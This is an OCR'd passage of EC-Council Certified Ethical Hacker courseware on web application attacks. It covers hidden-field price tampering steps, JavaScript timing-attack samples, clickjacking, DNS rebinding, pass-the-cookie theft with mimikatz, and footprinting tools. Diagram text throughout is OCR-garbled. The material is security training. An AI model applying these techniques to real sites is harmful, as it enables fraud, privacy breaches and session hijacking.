val ues and sent to t he application as an HTTP request (GET or POST)

8 HTML can also store field val ues as hidden f ields, which are not rendered to the screen by t he
browse r, but are instead collect ed and submitted as parameters duri ng form submissions

1. Product Price ...[ ..200··· ········~ ········ 1 !I Attackers can examine the HTML code of a page and change t he hidden field values to change
post requests to the server

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

Hidden Field Manipulation Attack

Attackers carry out hidden field manipulation attacks against e-commerce websites, as most of
these sites have hidden fields in their price and discount specifications. In every client session,
developers use hidden fields to store client information, including product prices and discount
rates. During the development of such programs, developers feel that all their applications are
safe; however, hackers can manipulate the product prices and even complete transactions with
the altered prices. When a user makes selections on an HTML page, the selection is typically
stored as form field values and sent to the application as an HTTP request (GET or POST). HTML
can also store field values as hidden fields, which are not rendered on the screen by the
browser but collected and submitted as parameters during form submissions. Attackers can
examine the HTML code of the page and change the hidden field values to change post
requests to the server.
Example

A particular mobile phone might be offered for $1000 on an e-commerce website, but the
hacker, by altering some of the hidden text in its price field, purchases it for only $10.
Such attacks result in severe losses for website owners, even though they might be using the
latest anti-virus software, firewalls, IDS, and so on to protect their networks from attacks.
Besides financial losses, the owners can also lose their market credibility. An example of such
code is given below:
<form method="post" action= "page.aspx">
<input type="hidden" name="PRICE" value="200.00">
Product name: <input type="text" name="product"
value="Certifiedhacker Shirt"><br>

Module 14 Page 1973 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

Product price: 200 . 00 "><br>

<input type= "submit" value="submit">
</form>
1. Open the html page within an HTML editor.

2. Locate the hiddenfield (e.g. "<type=hidden name=price value=200.00>").

3. Modify its content to a different value (e.g. "<type=hidden name=price value=2.00>").
4. Save the html file locally and browse it.
5. Click the Buy button to perform electronic shoplifting via hidden manipulation.

Module 14 Page 1974 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Web-based Timing Attacks

A web-based timing attack is a type of side-channel attack performed by attackers to retrieve sensitive information
such as passwords from web applications by measuring the response time taken by the server

Direct Timing 8 Direct timing attacks are carried out by measuring the approximate time taken by the server to process
Attack a POST request to deduce the existence of a username
I
I

Cross-site 8 A cross-site timing attack is another type of timi ng attack, in which attackers send crafted request
Timing Attack packets to the website using JavaSaipt

8 Attackers take advantage of side-channel leaks of a browser to estimate the time taken by the browser
Browser-based to process the requested resources
Timing Attack 8 Attackers can abuse different browser functionalities to launch further attacks such as video parsing
attacks and cache storage timing attacks

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

Web-based Timing Attacks

A web-based timing attack is a type of side-channel attack performed by attackers to retrieve
sensitive information such as passwords from web applications by measuring the response time
taken by the server. These attacks exploit side-channel leakage and estimate the amount of
time taken for secret key operations. Different types of web-based timing attacks include direct
timing attacks, cross-site timing attacks, and browser-based timing attacks.
■ Direct Timing Attack
Direct timing attacks are carried out by measuring the approximate time taken by the
server to process a POST request, through which attackers can deduce the existence of a
username. Similarly, attackers perform character by character password examination
and exploit the timing information to determine the position where the password
comparison failed. Then, attackers use this data to determine the target user's
password.
■ Cross-site Timing attack
A cross-site timing attack is another type of timing attack, in which attackers send
crafted request packets to the website using JavaScript, unlike a direct timing attack,
where the attacker himself/herself passes the request to a website. The attacker then
analyzes the time consumed by the user to download the requested file.
For instance, consider a website http://xyz.com that contains two separate groups such
as /the-prompt/ and /the-anonymous-place/, and only the group members have access
to the data fed into these groups. If any other person tries to access the group, an error
message is generated. Now, when a user accesses an unknown website that contains

Module 14 Page 1975 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

malicious JavaScript injected by the attacker, the attacker can find out which group the
user belongs to and thus violate his/her privacy.
Sample JavaScript code used to perform this attack:
function getMeasurement(url, callback) {
var a= new Image();
a.addEventListener('error', function() {
var conclude= performance . now();
callback(conclude - begin);
} ) ;

var begin= performance.now();

a.src = url;
}

getMeasurement('http://xyz . com/the-prompt/',
function(timeTF) {
getMeasurement('http://xyz.com/the-anonymous-place',
function(timeTDS) {
If (timeTF> timeTDS) {
alert('The prompt is alright!');
}

else {
alert('Privacy breach!');
}

} ) ;

}) ;

■ Browser-based Timing Attacks

Browser-based timing attacks are sophisti cated side-channel attacks. Rather th an
depending on the unsteady download time, attackers take advantage of side-channel
leaks of a browser to estimate the time taken by the browser to process the requested
resources. In this case, the time estimation begins immediately after the download of a
resource and ceases once the processing is done.
Attackers can abuse different browser functionalities to launch further attacks such as
video parsing attack, and cache storage t iming attack.
o Video-parsing Attack
Sample JavaScript code used to perform this attack:
function getMeasurement(url, callback) {

Module 14 Page 1976 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

var p = document.createElement('video');
var begin;
p.addEventListener('suspend', function() {
begin= performance.now();
} ) ;

p.addEventListener('error', function() {
var conclude= performance.now();
callback(conclude - begin);
} ) ;

p.src = url;
}

In contrast to cross-site timing attacks, here, the estimation time begins when the
event "suspend" is triggered . The event is usually triggered when the resource
downloading is stopped, as the requested resource is not an intended video; it is
only a double- or triple-digit KB file. The event is also triggered when the resource
download is completed. Subsequently, the browser attempts to parse the requested
resource as a video. Certainly, the files HTML/JSON/ ... are invalid video formats;
hence, the browser will raise an "error" event. Here, the attacker observes the
amount of time the browser takes to process the resource and generate an error
event. Single estimation for every end point might not always serve the purpose.
Therefore, attackers try to accumulate several time estimations and calculate the
median or average.
o Cache Storage Timing Attack
The Cache API interface (used to load, fetch, and delete any responses) offers
complete cache (memory) to the developers. Loading resources in the disk takes
some amount of time based on the resource size. If attackers can estimate the time
taken by the browser to perform this task, they can measure the corresponding
response size.
Sample JavaScript code used to perform this attack:
function getMeasurement(url, callback) {
fetch (url, {mode: "no-cors", credentials:
"include"}) .then(function(resp) {
setTimeout(function() {
caches.open('attackerfile') .then(function(ca
che){
var begin= performance.now() ;

Module 14 Page 1977 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

cache.put(new request('myfoo'),
resp.clone()) .then(function() {
var conclude= performance.now();
callback (conclude - begin);
}) ;

}) ;

} , 2000);
}) ;

After estimating or measuring the processing time using the abovementioned techniques,
attackers can launch further attacks such as brute-force attacks to obtain complete
information.

Module 14 Page 1978 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

MarioNet Attack

Mario Net is a browser-based attack that runs i

malicious code inside the browser, and the
infection persists even after closing or browsing I . •
~
Web Browser
away from the malicious webpage through
which infection has spread - - - -'r·-
"'"···_···_··_
···_
···_···..········o ·F: ;~;"~~·;,;;~~~·
Blocking \ r-~· Web Server
Attackers register and activate a Service Worker Extensions l L;
API through a website controlled by the attacker . e
: .. ... ..... , .......... : Webpage

When the victim browses that website, Service 'it 'it rendering
l e
Worker automatically activates and can run
persistently in the background ~
Website
l e
Service Communication
o..................~~.~~! .....
Worker ;:,. g
~ ·· r·► ~·······························c:::::::Bl
It can be used to create a botnet and launch
other malicious attacks such as cryptojacking, ) I c::-" Attacker's
DDoS, click fraud, and distributed password
cracking - ' Remotec&C

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

MarioNet Attack
MarioNet is a browser-based attack that runs malicious code inside the browser, and the
infection persists even after closing or browsing away from the malicious web page through
which the infection has spread . Most of the latest web browsers support a new API called
Service Workers that allows the website to isolate operations that render the web page UI from
intensive computational tasks to avoid freezing of the UI when large amounts of data are
processed.
Attackers register and activate the Service Workers API through a website controlled by them.
When the victim browses that website, the Service Workers API automatically activates, and it
can run persistently in the background even when the user is not actively browsing the website.
To keep the Service Workers API alive, attackers abuse the Service Workers SyncManager
interface.
Therefore, MarioNet can resist any tab crashes and power failures, increasing the attacker's
potential to attack the browser. MarioNet leverages the abilities of JavaScript and depends on
previously available HTMLS APls. It can be used to create a botnet and launch other malicious
attacks such as cryptojacking, DDoS, click fraud, and distributed password cracking.
Furthermore, this attack allows attackers to inject malicious code into high-traffic websites for a
short period, retrieve sensitive information such as user credentials, and then control the
abused browsers from a central server.

Module 14 Page 1979 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Web Browser
...................................................
0 Fetching webpage
Blocking Web Server
Extensions
,_____ ______,9
: • • • • • • • • • • • • • • • • • • • • ·: Webpage
~ 'ii rendering
Website
l Service A Communication
l
I Worker
~ .............................:> I,
V channel al
al
...t..3> <= ............................. , al
l •h~~=•d• Attacker's
1 .i::;~
</bod
Remote C&C
</html>

Figure 14.39: Illustration of MarioNet attack

Module 14 Page 1980 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Clickjacking Attack

Attacker Attacker's Website

Atta ckers perform clickjacking attacks
by tricking the victim into clicking on
any malicious web page eleme nt that
is placed transparently on the top of
any trusted web page
~ ········ ""'';:;:::;::::,"'··· ·· ---
Clickjacking is not a single t echnique
attackers leverage, but is instead a
variety of attack vectors and
techniques called UI redress attacks
♦
Attacke rse nds :
m alicious w ebsite ~
link via email !.

~ Victim opens
• A

~ Victim's browser
: opens the target
~ website
'V
14¥1 ,,,;;was bQ
Atta ckers perform this attack by ,-i.,;.._ .....A
V
.... !~~~. !~.~~~-~-~~~~··· ··· · ·· ···► Hi, You have won a
lottery of $2M, dick
exploiting the vulnerabilities caused the link to daim It. ._
by HTML iframes or impro per <·······································•
Victim clicks legitimate
··· ~!r.:=btteHbwlk.co
configuratio n of the X-Frame-Optio ns UI element and gets
header Victim clickjacked Victim's Bro wser

r- Copynght CJ by iC-C1uncil All Rights Reserved Reproduction IS Stnctly Proh1b1ted

Clickjacking Attack
A clickjacking attack is performed when the target website is loaded into an iframe element
that is masked with a web page element that appears legitimate. The attacker performs this
attack by tricking the victim into clicking on any malicious web page element that is placed
transparently on the top of any trusted web page. Clickjacking is not a single technique;
attackers leverage various attack vectors and techniques called UI redress attacks. They
perform such attacks by exploiting the vulnerabilities caused by HTML iframes or improper
configuration of the X-Frame-Options header. There are several variations of clickjacking
attacks such as likejacking and cursorjacking. To perform these attacks, attackers send a link to
the malicious website to the victim through email, social media, or any other media.
In clickjacking, the attacker loads the target website inside a low opacity iframe. Then, the
attacker designs a page such that all the clickable items such as buttons are positioned exactly
as on the selected target website. Now, the victim is tricked into clicking on the invisible
controls or the deceptive UI elements that automatically trigger various malicious actions such
as injecting malware, retrieving malicious web pages, retrieving sensitive information such as
credit card details, transferring money from the victim's account, and buying products online.
The various clickjacking techniques employed by attackers are listed below :
• Complete transparent overlay: In this technique, the transparent, legitimate page or
tool page is overlaid on the previously designed malicious page. Then, it is loaded into
an invisible iframe and the higher z-index value is assigned for positioning it on top.
■ Cropping: In thi s technique, only the selected controls from the transparent page are
overlaid. This technique depends on the goal of the attack and may involve masking
buttons with hyperlinks and text labels with false information, changin g the button

Module 14 Page 1981 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

labels with wrong commands, and completely covering the legitimate page with
misleading information while exposing only one original button.

■ Hidden overlay: In this technique, the attacker creates an iframe of lxl pixels
containing malicious content placed secretly under the mouse cursor. When the user
clicks on this cursor, it will be registered on the malicious page although the malicious
content is concealed by the cursor.
■ Click event dropping: This technique can completely hide a malicious page behind a
legitimate page. It can also be used to set the CSS pointer-events property of the top to
none. This can cause click events to "drop" through the legitimate masked page and
registers only the malicious page.
■ Rapid content replacement: In this technique, the targeted controls are covered by
opaque overlays that are removed only for a moment for registering a click. An attacker
using this technique needs to accurately predict the time taken by the victim to click on
the web page.

Attacker Attacker's Website

""•• O lwT;J'/ ~ "

Attacker overlays
malicious web page elements
WWW.c.rtlfledh1ck1r.com

Attacker sends
.
: Victim's browser
malicious website : opens the target
link via email
.
: website

Victim opens

..................................
link in the browser
·► Hi, You have won a "
lottery of $2M, click
the link to claim it. ...
<· ................................... • • • 1 <A
HREF=http://bank.co
Victim clicks legitimate
m/ ....
UI element and gets
Victim clickjacked Victim's Browser

Figure 14.40: Illustration of clickjacking attack

Module 14 Page 1982 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

DNS Rebinding Attack

Attackers use the DNS rebinding

technique to bypass the Sa me
Origin Policy's security constraints, Load
allowing the malicious web page certifiedhacker.com

to communicate or make arbitrary 1 DNS: resolve certifie dhacke r.com 1

requests to local domains
Example: An attacker creates a
I --- - -------- ---- - ------------ - - --- - ---- ---- - ) ,
: ·< DNS: IP of certifiedhacker.com (Short m) -10 .10. 10.10 -~
: ------- HTTP: get http://10.10.10.10/index.html _____ ~
I
: ,E-----HTTP: inde x.html embedded with JavaScript ------ :
I

malicious website with domain

Run the script which
name certifiedhacker.com and
requests
registers it with the DNS server http://certifiedhacker.com
controlled by them / secret.html 1

: DNS: resolve certifiedhacke r.com (due to short m) :

I - ----- - ---- - - -- ------ -- - - - --- - ------------ --· ) :

The attacker then configures the 1 DNS: IP o f xyz.com · 10.10.10.2 I

DNS server to send DNS responses
with very short TTL values to avoid
caching
I<--------------------------------------------- I
: HTTP: get http:/110.10.10.2/seaet.html I
I--------------------------------------------· >I
I HTTP: secre t.html
I
I Attacker have succes.sfully bypassed SOP. Now,
the script sends secret.html to the attacker

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

DNS Rebinding Attack

Attackers use the DNS rebinding technique to bypass the same-origin policy's security
constraints, allowing the malicious web page to communicate with or make arbitrary requests
to local domains. For instance, if a client is working for an organization, he/she mostly uses the
internal or private network. Any externals resources cannot be accessed inside that private
network due to the same-origin policy (SOP). Hence, attackers cannot directly communicate
with the local network due to restrictions in the SOP. Therefore, they use the DNS rebinding
technique to circumvent this SOP security implementation.
How DNS Rebinding Works

An attacker creates a malicious website with the domain name certifiedhacker.com and
registers it with the DNS server controlled by him/her. Now, the attacker configures the DNS
server to send DNS responses with very short TTL values to avoid caching of the responses.
Then, the attacker begins his/her intended operation with the HTTP server that contains the
malicious website http://certifiedhacker.com.
When the victim opens the malicious website, the attacker's DNS server sends the IP Address of
the HTTP server that hosts the attacker-controlled website http://certifiedhacker.com. The web
server responds with a page that runs JavaScript code in the victim's browser. Then, the
JavaScript code accesses the website on the domain http://certifiedhacker.com to get
additional resources from http://certifiedhacker.com/secret.html. When the browser runs the
JavaScript, it makes a DNS request for the domain (owing to the short TTL configuration), but
the attacker-controlled DNS server responds with a new IP. For instance, if the attacker-
controlled DNS server responds with the private or internal IP of xyz.com, the victim's browser
loads http://xyz.com/secret.html and not http://certifiedhacker.com/secret.html successfully by
bypassing the SOP.

Module 14 Page 1983 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Malicious Web Server

Victim's Web
hosting attacker's website
Browser
http://certifiedhacker.com

Load
certified hacker.com
I
1 DNS: resolve certified hacker.com 1
I ---------------------------------------------·>i
1 DNS: IP of certifiedhacker.com (Short TTL) - 10.10.10.10 I
I<----------------------------------------------~1
1
HTTP: get http://10.10.10.10/index.html
I-----------------------------------------------~I
HTTP: index.html embedded with JavaScript 1
<E-----------------------------------------------1
Run the script which
requests
http://certifiedhacker.com
/secret.html
I
I DNS: resolve certifiedhacker.com (due to short TTL) 1
1---------------------------------------------·>1
I I
1 DNS: IP of xyz.com - 10.10.10.2 1
1< ---------------------------------------------- I
I HTTP: get http://10.10.10.2/secret.html 1
1----------------------------------------------
I
>1
HTTP: secret.html
Attacker have successfully bypassed SOP. Now,
the script sends secret.html to the attacker

Figure 14.41: Demonstration of DNS rebinding attack

Module 14 Page 1984 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Same-Site Attack

Same-s ite attacks, also know n as related-domain attacks, occur w hen an attacker target s a subdo main of a t rust ed
organization and attempts t o redirect users to an attacker-controlled web page
Familiar domains such as .edu, .com, and .org cont ain several perimeters that make it easy for attackers to capt ure
unused or misconfigur ed subdomains sharing t he legitimat e sit e's top-level domains (TLDs)
These TLDs help attackers in hijacking the legitimate website to creat e dangling records using extend ed TLDs (eTLDs)

Both domains belong

to certifiedhacker.com

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

Same-Site Attack
Same-site attacks, also known as related-domain attacks, occur when an attacker targets a
subdomain of a t rusted organization and attempts to redirect users to an attacker-controlled
web page. Subdomains that are misconfigured or left for years without use are often targeted
by attackers to perform this attack. Generally, the most familiar domains such as .edu, .com,
and .org contain several perimeters that make it easy for attackers to capture unused or
misconfigured subdomains sharing the legitimate site's top -level domains (TLDs). These TLDs
help attackers in hijacking the legitimate websites to create dangling records using extended
TLDs (eTLDs) . Such websites sharing the same eTLD+l domain are called same sites, which can
be targeted by same-site attackers.
These attacks work on the notion that identifying external enemies is easier than betraying
insider enemies. The victims of these attacks are redirected to an attacker-controlled web page,
which has the appearance of a secure, legitimate web page. The vulnerable subdomains can be
compromised through phishing attacks, malware injection, cookie poisoning, abuse of
JavaScript APls, etc. Users who utilize dynamic DNS facilities are especially vulnerable to these
attacks. Same-site attackers can also obtain cookies because similar sites that use the eTLD+l
domain share cookies.
Same-Site Attack Scenario
In a Same-site attack, th e attacker redirects a user attempting to browse
www.certifiedhacker.com to an attacker-controlled dangling site, rans.certifiedhacker.com. The
malicious link shares a common domain name, which lures the user into believing that the
redirected site is the secure or legitimate one. Then, the attacker can perform security policy
intrusion, credential sniffing, phishing, and malware injection attacks by taking over
subdomains.

Module 14 Page 1985 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

Browsing for a website

·O·································► "
..........'!'<: .......... .... . l-c','-'_]
Legitimate site
User
(www.certifiedhacker.com)

Attacker

Both domains belong

to certifiedhacker.com

Figure 14.42: Illustration of a same-site attack

Module 14 Page 1986 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Pass-the-Cookie Attack
Pass-the-cookie attacks allow attackers to access a user's web services without providing any identity or
performing multi-factor authentication
The pass-the-cookie attack occurs when attackers obtain a clone of a cookie from the user's browser and uses the
cookie to establish a session with the target web server

A session cookie is generated in the browser when the

0 user logs into a web service

..•·®

User
••··••..

····.*
··...
ft.
V'
The attacker steals the cookie using
specially designed malware

• ~ The attacker injects the cookie into their browser

.:,- session to access the victim's web services

Attacker
.. .... . .~·· ··•I~~~~;/~I
Browser Session
Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

Pass-the-Cookie Attack
Pass-the-cookie attacks allow attackers to access a user's web services without providing any
identity or performing multi-factor authentication . A pass-the-cookie attack occurs when
attackers obtain a clone of a cookie from the user's browser and uses the cookie to establish a
session with the target web server. If attackers can retrieve appropriate cookies, they may log
in as a valid entity to previously accessed web services, evading all the authentication
checkpoints. Attackers may also use a specifically developed program or a phishing attack to
obtain these cookies.
For example, Mozilla Firefox saves all cookies inside a local SQLite database that attackers may
acquire using tools such as fire fox_creds. If the captured cookie is a session cookie, the
attacker can use malware to implant their own session while browsing the web application.
Attackers can also use mimikatz to extract encrypted cookies.

Module 14 Page 1987 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

A session cookie is generated in the browser when the

0 user logs into a web service

•.
······...........~
The attacker steals the cookie using
specially designed malware

User
The attacker injects the cookie into their browser
session to access the victim's web services

Attacker
·····•I~~~~;, I
Browser Session

Figure 14.43: Illustration of a pass-the-cookie attack

Module 14 Page 1988 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

10#03: Explain Web Application Hacking Methodology

· ~ - Copyright C by IC-CIIICII All Rights Reserved Reprod uction 1s Strictly Proh1b1ted

Web Application Hacking Methodology

Footprint Web Infrastructure Attack Session Management Mechanism

Analyze Web Applications l Perform Injection Attacks

Bypass Client-Side Controls ~ Attack Application Logic Flaws

Attack Authentication Mechanism I Attack Shared Environments

Attack Authorization Schemes Lm Attack Database Connectivity

Attack Access Controls

J L[El Attack Web App Client

Attack Web Services

1• _._ ~ Copynght Clby lC·Cluntil All Rights Reserved Reproduction ts Strictly Proh1b1ted

Web Application Hacking Methodology

The previous section discussed the security posture of web applications by analyzing various
types of threats/attacks currently in use. Attackers perform these attacks using a detailed
process called the hacking methodology. This section will describe the steps of the hacking
methodology, explaining how attackers t arget web applications.

Module 14 Page 1989 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

Attackers use the web application hacking methodology to gain knowledge of a particular web
application to compromise it successfully. This methodology allows them to plan each step in
detail to increase their chances of successfully hacking the application. Under this methodology,
they do the following to collect detailed information about various resources needed to run or
access the web application:

• Footprint web infrastructure

• Analyze web applications

• Bypass client-side controls
• Attack authentication mechanisms
• Attack authorization schemes

• Attack access controls

• Attack session management mechanisms
• Perform injection attacks
• Attack application logic flaws

• Attack shared environments

• Attack database connectivity
• Attack web application clients
• Attack web services
If hackers do not use this process and try to exploit the web application directly, their chances
of failure increases. The following phases of this module will provide a detailed explanation of
how attackers derive information about these resources.

Module 14 Page 1990 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Footprint Web Infrastructure

Web infrastructure footprinting is the first step in web application hacking; it helps attackers to select victims
and identify vulnerable web applications

Server
e Discover the physical servers that host web applications
Discovery

Service e Discover the services running on web servers that can be exploited as attack paths for web app
Discovery hacking

Server I8 Grab server banners to identify the make and version of the web server software
Identification

Discovery
I8 Extract content and functionality that is not directly linked or reachable from the main visible content

Load Balancers
Detection
I8 Detect load balancers along with their real IP addresses

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

Footprint Web Infrastructure: Server Discovery

Server discovery gives information about server locations and ensures that the target server is live on the Internet

Whois lookup utilities provide information about the IP address of the web server and DNS names
Whois Whois Lookup Tools:
Lookup !I Netcraft/https://www.netcraft.cam) !I W HOIS Lookup /https://whois.damaintoals.cam)
8 SmartW hois (https://www.tamos.com) 6 Batch IP Converter (http://www.sabsoft.com)

DNS interrogation provides information about the locations and types of servers
-
DNS DNS Interrogation Tools:
Interrogation 8 DNSRecon (https://github.cam) 8 Domain Dossier (https://centrafops.net)
8 DNS Records (https://network-toals.com) 6 DNSdumpster.com (https://dnsdumpster.com)

Port scanning attempts to connect to a particular set of TCP or UDP ports to discover services that exist on
the server
Port
Port Scanning Tools:
Scanning
8 Nmap (https://nmap.org) 8 NetScanToo ls Pro (https:// www.netscantools.com)
8 Advanced Port Scanner (https://wwwadvanced-part-scanner.com) 6 Hping (http://www.hping.arg )

Note: For compl et e coverage of Whoi s lookup , DNS i nterrogation, and po rt scanning, refer to Module 02: Footprinting and Reconnaissa nee a s w ell as Module 03: Sea nningNe tworks

Copynght Cl by fC·CIUDCil All Rights Reserved Reproduction ts Strictly Proh1b1ted

Module 14 Page 1991 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Footprint Web Infrastructure: Service Discovery

Scan the target web server to identify common ports that web servers use for different services

You can use tools such as Nmap, NetScanTools Pro, and Sandcat Browser for discovering services

Identified services act as attack paths for web application hacking

• Ztnmap 0 X
Sc.tn Jools P.rofilt l:!elp

Targfl: ll.,25,80,3389 googlt.com 3 Profile:

Comrrnind: nrmp · T4 ·A •v -PE -PS -PA 2Z,25,80, H89 googlt.eom

Hom ~rvicelo Nmap Output Ports / Hosts Topology Host D~ails Suns
◄ Port ... Protocol ◄ Stfte ◄ Sew.ct ◄ Version

• ., "'
OS ◄ Host
googlt.eom (142.2!

• "' 113

•• "'"'
443 open hnps gws
2000 o p en (IS(O• KCp

FiltttHosts
• "' 5060 opai sip

https:// nmop.org

r- Copynght CJ by iC-C1uncil All Rights Reserved Reproduction IS Stnctly Proh1b1ted

Footprint Web Infrastructure: Server Identification/

Banner Grabbing

8 Analyze the serverresponse header field to identify the make, 8 Run command s _ c l ient - host <target website> - port
model, and versi on of the web server software 4 43

e Syntax: C : \telnet < Website domain or IP s Type GET/ HTTP/ 1 . o and pressenterto get the server information
address> 80

116. 15·83 Giff

Server ident ified

as Microsoft-US
4 Giff
onnect1on · close
ontent L th. 783

Copyright Cl by EC·CIUOCil All Rights Reserved Reproduction is Strictly Proh1b1ted

Module 14 Page 1992 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Footprint Web Infrastructure: Detecting Web App Firewalls

and Proxies on Target Site
Detecting Proxies Detecting Web Application Firewalls
Determine whether your target site is routing your Determine whether your target site is running a web app firewall
requests through any proxy servers in front of a web application

Proxy servers generally add certain headers in the
response header field
Use the HTTP/1.1 TRACE method to identify any changes
that a proxy server made to the request
Check the cookies response to your request because most of the
WAFs add their own cookie in the response
Use WAF detection tools such as WAFWOOF to find which WAF is
running in front of the application

"Via:" , "X-Forwarded-For : ","Proxy-Conn ection:"

TAACE / HTTP/ 1. 1
Ho s t: www. test. c an
HTTP/1. 1 300 OK

Sarver: Microsoft-IIS/10 .0
Data: Sat, 23 Apr 2022 15:25 15 GIT
Con tent- l e ngth: 40
TRACE / HTTP/ 1. 1

Host: www. test.can

Via: 1.1 192.168 .11 15

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

Footprint Web Infrastructure: Hidden Content Discovery

Discover any hidden content and functionality that is not reachable

from the main visi ble content to exploit user privileges within the OWASP Zed Attack Proxy
application

This allows an attacker to recover backup copies of live files, ia lrilao O ., l " · Cl;. a
configuration files and log files containing sensitive data, backup
e :::co
archives containing snapshots of files within the web root, new Automated Scan
functionality that is not linked to the main application, etc. Thl,s.,~..,-youtclaunrh-,-...:omalNlscana,gainst .,~atlor> · t-,Sl
eoter hUll..below- P'HS 'l <t.c;I('
Plea<e t,,, ....,.._ t NI you - ~ a t t a c k IIPllk•lonstNI y o u - -
si>ec.llc..,.t,,,e.1~pemis-1011Kt

We b Spidering/Crawling Attacker-Directe d Spidering

httpJ/WWW.,,..,...scope com 9 Select
URtr~w16er": ~

8 Web spiders/crawlers e The attacker accesses all !JHot""I , - 1r-ws~ 1 lMpU: tliSpider 1 -S<an ♦
automatically discover hidden functionality of an application and • 4j / - F. . i,«.ikol..,selkt..i-.w11t,,,~i,-•

content and functionality by uses an intercepting proxy such as ~;:ction

,.~ •e wtl>Ol.t MAC SigNttU'e (\.,l"ISU'eJ ())
! ~ ~ ~ ~ a l e f t1 t,y~dc~ontherdevartlne~trotl'nt""1-

parsing HTM Lforms and client-side
JavaScript request s and responses
8 Attackers use tools such as OWASP
OWASP Zed Attack Proxy to monitor
all requests and responses
8 The int ercepting proxy parses all
,.X~rarne-Oi,tlonl He-. '-IOt Set()) You can .iso edit •~lltinoJalerts b)'ao.mle clCl<ln; on them.
,.....,,mc•<>IN'itl<::51\F T...._())
fOSerwtl.eoblnfl>tTn.ckln \lWl")(-Pc,we,.,i.ey-
,.) ( ~-Vlf"SionR-Heaclef())
l>X-Cor(eN:-Type-QJ,tlorts He.otr M$""9 06]
10i'llorn">,itlon OIK1ol,,.re - SuspldousCommeru

Zed Attack Proxy, Burp Suite, application response s and report s

